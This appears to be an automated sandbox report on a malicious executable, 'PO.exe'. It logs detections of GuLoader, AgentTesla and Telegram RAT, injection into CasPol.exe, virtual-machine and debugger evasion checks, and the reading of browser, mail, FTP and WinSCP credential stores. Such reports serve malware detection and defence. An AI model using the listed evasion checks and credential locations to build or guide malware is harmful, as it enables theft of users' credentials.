Source: C:\Users\user\Desktop\PO.exe

1_2_004033B6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Temp\nsw9704.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/7@2/2

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_00402095 CoCreateInstance,

1_2_00402095

Source: C:\Users\user\Desktop\PO.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_004046DD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\One

Jump to behavior

Source: PO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.84958072563.0000000001110000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_10002DE0 push eax; ret	1_2_10002E0E
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A2FF5 push cs; retf	1_2_032A3005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01049297 push eax; iretd	4_2_010492C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 4_2_01467E2F push edi; retn 0000h	4_2_01467E31

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\PO.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP A
Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2364	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2364	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5828	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_032A0D2D rdtsc

1_2_032A0D2D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9851

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040596F
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_004064C1 FindFirstFileW,FindClose,	1_2_004064C1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_004027FB FindFirstFileW,	1_2_004027FB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	API call chain: ExitProcess graph end node			graph_1-9251
Source: C:\Users\user\Desktop\PO.exe	API call chain: ExitProcess graph end node			graph_1-9249

Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PO.exe, 00000001.00000002.85190215357.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep a
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000004.00000002.89317737865.000000000152C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.89316980207.00000000014CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: PO.exe, 00000001.00000002.85191962285.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

1_2_10001B18

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_032A0D2D rdtsc

1_2_032A0D2D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032C3323 mov eax, dword ptr fs:[00000030h]	1_2_032C3323
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032C5559 mov eax, dword ptr fs:[00000030h]	1_2_032C5559
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032A6243 mov eax, dword ptr fs:[00000030h]	1_2_032A6243
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032AB2AB mov eax, dword ptr fs:[00000030h]	1_2_032AB2AB
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_032ABAFF mov eax, dword ptr fs:[00000030h]	1_2_032ABAFF

Source: C:\Users\user\Desktop\PO.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_032C3341 LdrLoadDll,

1_2_032C3341

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1110000

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\PO.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_032A77C4 cpuid

1_2_032A77C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_004061A0 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

1_2_004061A0

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.89339190222.000000001D990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Source: Yara match	File source: 00000004.00000002.89336734210.000000001D8B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 7240, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

